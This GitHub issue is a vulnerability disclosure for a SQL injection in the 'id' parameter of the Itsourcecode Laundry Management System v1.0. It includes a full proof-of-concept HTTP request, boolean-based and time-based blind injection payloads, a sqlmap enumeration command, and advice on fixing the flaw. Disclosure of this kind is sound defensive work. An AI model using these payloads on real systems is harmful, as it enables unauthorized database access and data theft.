Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Itsourcecode Laundry Management System Project In PHP v1.0 admin_class.php SQL injection #2

Open
chenwulin-bit opened this issue Jun 14, 2024 · 0 comments

Comments

@chenwulin-bit
Copy link
Owner

Itsourcecode Laundry Management System Project In PHP v1.0 admin_class.php SQL injection

NAME OF AFFECTED PRODUCT(S)

  • Laundry Management System Project In PHP

Vendor Homepage

AFFECTED AND/OR FIXED VERSION(S)

submitter

  • chenwulin

Vulnerable File

  • admin_class.php

VERSION(S)

  • V1.0

Software Link

PROBLEM TYPE

Vulnerability Type

  • SQL injection

Root Cause

  • A SQL injection vulnerability was found in the 'admin_class.php' file of the 'Laundry Management System Project In PHP' project. The reason for this issue is that attackers inject malicious code from the parameter "id" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
1

Impact

  • Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.

DESCRIPTION

  • Due to insufficient user input validation for the "id" parameter, a serious SQL injection vulnerability was discovered in the login function of the "Laundry Management System Project In PHP", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity.

Vulnerability details and POC

POST /ajax.php?action=save_user HTTP/1.1
Host: 192.168.1.136:1215
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 62
Origin: http://192.168.1.136:1215
Connection: close
Referer: http://192.168.1.136:1215/index.php?page=users
Cookie: PHPSESSID=rfkglhgunub3dub22riq796k7j; pma_lang=zh_CN; phpMyAdmin=ujrjcboafog9dlu1gdvde2h12k; pmaUser-1=%7B%22iv%22%3A%22vK4EAyr9VLsT3SeOUwZUIw%3D%3D%22%2C%22mac%22%3A%2268eccff8dac32025157f35833e5b8871300b0bc6%22%2C%22payload%22%3A%22Q7C3Smm%2BfZKGX%2BXNQgbuWA%3D%3D%22%7D; pmaAuth-1=%7B%22iv%22%3A%22s2zrXn936ONY3MbdOHfxvA%3D%3D%22%2C%22mac%22%3A%226b376c3eee69bfaecc9058af2d8e98e0758d1d9a%22%2C%22payload%22%3A%22Pga6jrC2TLPgsCis%5C%2FvquwEPKjbO40AEpBValSJIcQAM%3D%22%7D
Priority: u=1

name=admin123&username=admin111&password=admin123&type=1&id=''

Vulnerability type:

  • time-based blind
  • boolean-based blind

Vulnerability location:

  • 'id' parameter

Payload:

Parameter: id (POST)

    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (8108=8108) THEN '' ELSE (SELECT 4193 UNION SELECT 7658) END))&name=admin123&username=admin111&password=admin123&type=1

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: id=(SELECT 9119 FROM (SELECT(SLEEP(5)))uzyR)&name=admin123&username=admin111&password=admin123&type=1
2

The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:

sqlmap -r 123 --batch --dbs
3

Suggested repair

  1. Use prepared statements and parameter binding:
    Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.

  2. Input validation and filtering:
    Strictly validate and filter user input data to ensure it conforms to the expected format.

  3. Minimize database user permissions:
    Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.

  4. Regular security audits:
    Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant